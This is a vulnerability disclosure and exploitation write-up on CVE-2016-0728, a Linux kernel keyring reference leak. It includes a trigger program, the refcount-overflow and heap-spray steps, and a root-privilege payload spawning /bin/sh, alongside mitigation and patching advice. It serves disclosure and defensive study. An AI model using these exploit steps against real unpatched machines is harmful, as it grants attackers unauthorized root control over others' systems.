The Perception Point Research team has identified a zero-day local privilege escalation vulnerability in the Linux kernel (CVE-2016-0728). Our team discovered the vulnerability recently, although it has existed in the kernel since 2012. After the discovery, the team disclosed the details to the Linux kernel security team and developed a proof of concept (PoC) exploit.

As of the date of disclosure, this vulnerability affects tens of millions of Linux PCs and servers and 66% of all Android devices (phones and tablets). Neither our research team nor the Linux kernel security team has observed any exploit targeting this vulnerability in the wild. Even so, our experts recommend that security teams examine potentially affected devices and apply patches as soon as possible.

In this article we will examine the technical details of the Linux kernel vulnerability and the techniques used to achieve kernel code execution using the vulnerability. Ultimately, the PoC provided successfully escalates privileges from a local user to root.

The Linux kernel bug

CVE-2016-0728 is caused by a reference leak in the keyrings facility. Before we dive into the details of this Linux kernel exploit, it is important to review the background behind the bug. To quote from the man page, “The keyrings facility is primarily a way for drivers to retain or cache security data, authentication keys, encryption keys and other data in the kernel. System call interfaces [keyctl syscall] are provided so that userspace programs can manage those objects and use the facility for their own purposes.” There are two other syscalls used for handling keys (add_key and request_key), but keyctl is the most relevant in this use case.

Each process can create a keyring for the current session using keyctl(KEYCTL_JOIN_SESSION_KEYRING, name), either assigning a name to the keyring or passing NULL to leave it unnamed. The keyring object can be shared between processes by referencing the same keyring name. If a process already has a session keyring, this same system call replaces its keyring with a new one. When an object is shared between processes, the object’s internal refcount, stored in a field called “usage”, is incremented. The leak occurs when a process tries to replace its current session keyring with the very same one. As the next code snippet, taken from kernel version 3.18, shows, execution jumps to the error2 label, which skips the call to key_put and leaks the reference that find_keyring_by_name took.

long join_session_keyring(const char *name)
{
 ...
       new = prepare_creds();
 ...
       keyring = find_keyring_by_name(name, false); //find_keyring_by_name increments  keyring->usage if a keyring was found
       if (PTR_ERR(keyring) == -ENOKEY) {
               /* not found - try and create a new one */
               keyring = keyring_alloc(
                       name, old->uid, old->gid, old,
                       KEY_POS_ALL | KEY_USR_VIEW | KEY_USR_READ | KEY_USR_LINK,
                       KEY_ALLOC_IN_QUOTA, NULL);
               if (IS_ERR(keyring)) {
                       ret = PTR_ERR(keyring);
                       goto error2;
               }
       } else if (IS_ERR(keyring)) {
               ret = PTR_ERR(keyring);
               goto error2;
       } else if (keyring == new->session_keyring) {
               ret = 0;
               goto error2; //<-- The bug is here, skips key_put.
       }
       /* we've got a keyring - now install it */
       ret = install_session_keyring_to_cred(new, keyring);
       if (ret < 0)
               goto error2;
       commit_creds(new);
       mutex_unlock(&key_session_mutex);
       ret = keyring->serial;
       key_put(keyring);
okay:
       return ret;
error2:
       mutex_unlock(&key_session_mutex);
error:
       abort_creds(new);
       return ret;
}
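The effect of the skipped key_put can be modeled in user space. The following is a minimal sketch, not kernel code: struct toy_key and every toy_* function are hypothetical stand-ins for the keyring, find_keyring_by_name, key_put and join_session_keyring. It compares the early-exit path as written above with one way of closing the leak, namely dropping the lookup reference before bailing out.

```c
#include <stddef.h>

/* Toy stand-in for struct key: only the reference count matters here. */
struct toy_key {
    int usage;
};

/* Mimics find_keyring_by_name(): a successful lookup takes a reference. */
static struct toy_key *toy_find(struct toy_key *k)
{
    k->usage++;
    return k;
}

/* Mimics key_put(): drops one reference. */
static void toy_put(struct toy_key *k)
{
    k->usage--;
}

/* Buggy path: the keyring found is already the session keyring, so the
 * function returns without dropping the reference taken by the lookup. */
static int toy_join_buggy(struct toy_key *session)
{
    struct toy_key *found = toy_find(session);
    if (found == session)
        return 0;               /* one reference leaked per call */
    toy_put(found);
    return 0;
}

/* Assumed fix for illustration: release the lookup reference first. */
static int toy_join_fixed(struct toy_key *session)
{
    struct toy_key *found = toy_find(session);
    if (found == session) {
        toy_put(found);
        return 0;
    }
    toy_put(found);
    return 0;
}

/* Calls `join` `calls` times on a keyring that starts with one reference
 * and returns the resulting usage count. */
static int toy_usage_after(int (*join)(struct toy_key *), int calls)
{
    struct toy_key session = { .usage = 1 };
    for (int i = 0; i < calls; i++)
        join(&session);
    return session.usage;
}
```

Calling toy_usage_after(toy_join_buggy, 100) yields 101, while toy_usage_after(toy_join_fixed, 100) stays at 1.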

Triggering the bug from userspace is fairly straightforward, as we can see in the following code snippet:

/* $ gcc leak.c -o leak -lkeyutils -Wall */
/* $ ./leak */
/* $ cat /proc/keys */
#include <stddef.h>
#include <stdio.h>
#include <sys/types.h>
#include <keyutils.h>
int main(int argc, const char *argv[])
{
    int i = 0;
    key_serial_t serial;
    serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, "leaked-keyring");
    if (serial < 0) {
        perror("keyctl");
        return -1;
    }
    if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL) < 0) {
        perror("keyctl");
        return -1;
    }
    for (i = 0; i < 100; i++) {
        serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, "leaked-keyring");
        if (serial < 0) {
            perror("keyctl");
            return -1;
        }
    }
    return 0;
}

After this program runs, /proc/keys shows leaked-keyring holding 100 references.

Exploiting the Linux kernel bug

Though the bug itself can directly cause a memory leak, it also has far more serious consequences.

After a quick examination of the relevant code flow, our research team found that the usage field used to store the object's reference count is of type atomic_t, which under the hood is basically an int, meaning it is 32 bits wide on both 32-bit and 64-bit architectures. While any integer can theoretically overflow, this width makes overflowing the reference count through the leak feasible in practice. As it turns out, no checks are performed to prevent the usage field from overflowing and wrapping around to 0.
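The wraparound can be illustrated with plain 32-bit arithmetic. This is a small sketch rather than kernel code: counter_after is a hypothetical helper, and it uses uint32_t because unsigned arithmetic is defined to wrap modulo 2^32 in C, which models how a 32-bit counter behaves once enough references are leaked.

```c
#include <stdint.h>

/* Value of a 32-bit counter that started at `start` after `increments`
 * increments. The sum is computed in 64 bits and then truncated, which
 * is the same as counting modulo 2^32. */
static uint32_t counter_after(uint32_t start, uint64_t increments)
{
    return (uint32_t)(start + increments);
}
```

A counter starting at 1 reads 101 after 100 increments, reads 0 after 0xFFFFFFFF increments, and is back at 1 after 0x100000000 increments.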

If a process causes the kernel to leak 0x100000000 references to the same object, it can later cause the kernel to think the object is no longer referenced and consequently free the object. If the same process holds another legitimate reference and uses it after the kernel frees the object, it will cause the kernel to reference deallocated or reallocated memory. This means that you can achieve a use-after-free by using the exact same bug from before. A lot has been written on use-after-free vulnerability exploitation in the kernel, so the following steps wouldn’t surprise an experienced vulnerability researcher. The outline of the steps that need to be executed by the exploit code is as follows:

  1. Hold a (legitimate) reference to a key object
  2. Overflow the same object’s usage
  3. Get the keyring object freed
  4. Allocate a different kernel object from user-space, with a user-controlled content, over the same memory previously used by the freed keyring object
  5. Use the reference to the old key object and trigger code execution

The first step comes from the manpage and the subsequent step was explained earlier. Now, let’s dive into the technical details of the remaining steps.

Overflowing usage Refcount

This step is actually an extension of the bug. The usage field is of int type, meaning it can hold only 2^32 distinct values on both 32-bit and 64-bit architectures. To overflow the usage field, you must loop the snippet above 2^32 times so that usage wraps around to zero.

Freeing keyring object

There are a couple of ways to get the keyring object freed while holding a reference to it. One possible way is to use one process to overflow the keyring usage field to 0 and let the garbage collection algorithm inside the keyring subsystem free the object. The garbage collector frees any keyring object as soon as its usage counter is 0. One caveat, though, is that inside join_session_keyring, prepare_creds also increments the usage of the current session keyring, and abort_creds or commit_creds decrements it again. The problem is that abort_creds doesn’t decrement the keyring’s usage field synchronously; the decrement happens later in an RCU job, which means we can overflow the usage counter without knowing it was overflowed.

It is possible to solve this issue by calling sleep(1) after each call to join_session_keyring, but sleeping for 2^32 seconds is of course not feasible. A feasible workaround is to use a variation of the divide-and-conquer approach and sleep after 2^31-1 calls, then after 2^30-1 calls, and so on. This way you never overflow unintentionally, because the refcount can be at most double the value it should have if no RCU jobs have run yet.
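One reading of this schedule can be written down as a list of batch sizes, with a pause after each batch so that pending RCU jobs can run. The sketch below is an interpretation of the text, not code from the exploit; plan_batches and total_calls are hypothetical helpers that only compute the numbers.

```c
#include <stddef.h>
#include <stdint.h>

/* Fills `batches` with 2^31-1, 2^30-1, ..., 2^1-1 and returns how many
 * entries were written (never more than `max`). */
static size_t plan_batches(uint64_t *batches, size_t max)
{
    size_t n = 0;
    for (int k = 31; k >= 1 && n < max; k--)
        batches[n++] = ((uint64_t)1 << k) - 1;
    return n;
}

/* Sums the planned batch sizes. */
static uint64_t total_calls(const uint64_t *batches, size_t n)
{
    uint64_t sum = 0;
    for (size_t i = 0; i < n; i++)
        sum += batches[i];
    return sum;
}
```

Under this reading the plan has 31 batches, so 31 pauses instead of one per call, and the batches add up to 2^32 - 33 calls.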

Allocating and controlling kernel object

With the process pointing to a freed keyring object, you now need to allocate a kernel object that will overwrite the freed keyring object. This is easy thanks to how SLAB memory works: allocate many objects of the keyring's size just after the object is freed. In this case, we chose to use the Linux IPC subsystem to send messages of size 0xb8 – 0x30, where 0xb8 is the size of the keyring object and 0x30 is the size of a message header.

if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
    perror("msgget");
    exit(1);
}
for (i = 0; i < 64; i++) {
    if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
        perror("msgsnd");
        exit(1);
    }
}

This way we control the lower 0x88 bytes of the keyring object.
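The size arithmetic can be made explicit in the message definition. The snippet above does not show how msg is declared, so the following is an assumed layout: struct spray_msg, the two macros and spray_payload_size are hypothetical names, while the long mtype followed by the payload is the layout msgsnd expects.

```c
#include <stddef.h>

#define KEYRING_OBJ_SIZE 0xb8   /* size of the keyring object, per the text */
#define MSG_HEADER_SIZE  0x30   /* size of the kernel message header, per the text */

/* Message buffer for msgsnd(): a long message type followed by the payload. */
struct spray_msg {
    long mtype;
    char mtext[KEYRING_OBJ_SIZE - MSG_HEADER_SIZE];
};

/* Number of payload bytes the sender controls in each message. */
static size_t spray_payload_size(void)
{
    return sizeof(((struct spray_msg *)0)->mtext);
}
```

With these sizes the payload is 0x88 bytes, which matches the number of controlled bytes stated above.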

Gaining kernel code execution

From here it’s a relatively easy process thanks to the struct key_type pointer inside the keyring object, which leads to a structure containing many function pointers. An interesting one is the revoke function pointer, which can be invoked using the keyctl(KEYCTL_REVOKE, key_name) syscall. The following is the Linux kernel snippet calling the revoke function:

void key_revoke(struct key *key)
{
       . . .
       if (!test_and_set_bit(KEY_FLAG_REVOKED, &key->flags) &&
           key->type->revoke)
               key->type->revoke(key);
       . . .
}

The keyring object should be filled as follows. The uid and flags attributes should be set so that execution passes a few control checks and reaches key->type->revoke. The type field should point to a user-space struct containing the function pointers, with revoke pointing to a function that will be executed with root privileges. Below is a code snippet that demonstrates this:

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
/* User-space copy of the key_type layout: 12 pointer-sized slots precede revoke. */
struct key_type_s {
    void * padding[12];
    void * revoke;
} type;
/* Kernel addresses are specific to the target kernel build. */
_commit_creds commit_creds = (_commit_creds)0xffffffff81094250;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)0xffffffff81094550;
/* Invoked by the kernel through key->type->revoke. */
void userspace_revoke(void * key) {
    commit_creds(prepare_kernel_cred(0));
}
int main(int argc, const char *argv[]) {
    ...
    struct key_type_s * my_key_type = NULL;
    ...
    my_key_type = malloc(sizeof(*my_key_type));
    my_key_type->revoke = (void*)userspace_revoke;
    ...
}

The addresses of the commit_creds and prepare_kernel_cred functions are static and can be determined per Linux kernel version or Android device. The last step concludes the process:

execl("/bin/sh", "/bin/sh", (char *)NULL);

For more information, refer to the full Linux kernel exploit, which runs on kernel 3.18 64-bit. The full exploit takes about 30 minutes to run on an Intel Core i7-5500 CPU (time is typically not an issue in a privilege escalation exploit).

Linux kernel vulnerability mitigations

The vulnerability affects any Linux kernel version 3.8 and higher. SMEP and SMAP make it difficult to exploit, as does SELinux on Android devices. It is important to patch as soon as you can so that the vulnerability can no longer be exploited.
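As a first triage step, a kernel release string can be compared against the 3.8 threshold. The following is a minimal sketch with a hypothetical helper, kernel_at_least; it assumes the release string starts with major.minor, as the output of uname -r normally does. A version at or above 3.8 only means the kernel falls in the affected range, since a distribution may already ship the fix in that kernel.

```c
#include <stdio.h>

/* Returns 1 if `release` (for example the string printed by `uname -r`)
 * is at least major.minor, 0 if it is older, and -1 if the string does
 * not start with two dot-separated numbers. */
static int kernel_at_least(const char *release, int major, int minor)
{
    int maj = 0, min = 0;
    if (sscanf(release, "%d.%d", &maj, &min) != 2)
        return -1;
    if (maj != major)
        return maj > major;
    return min >= minor;
}
```

For example, kernel_at_least("3.18.0", 3, 8) returns 1 and kernel_at_least("3.2.0", 3, 8) returns 0.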

Thank you to David Howells, Wade Mealing, and the whole Red Hat Security team for their fast response and their cooperation in fixing the bug.
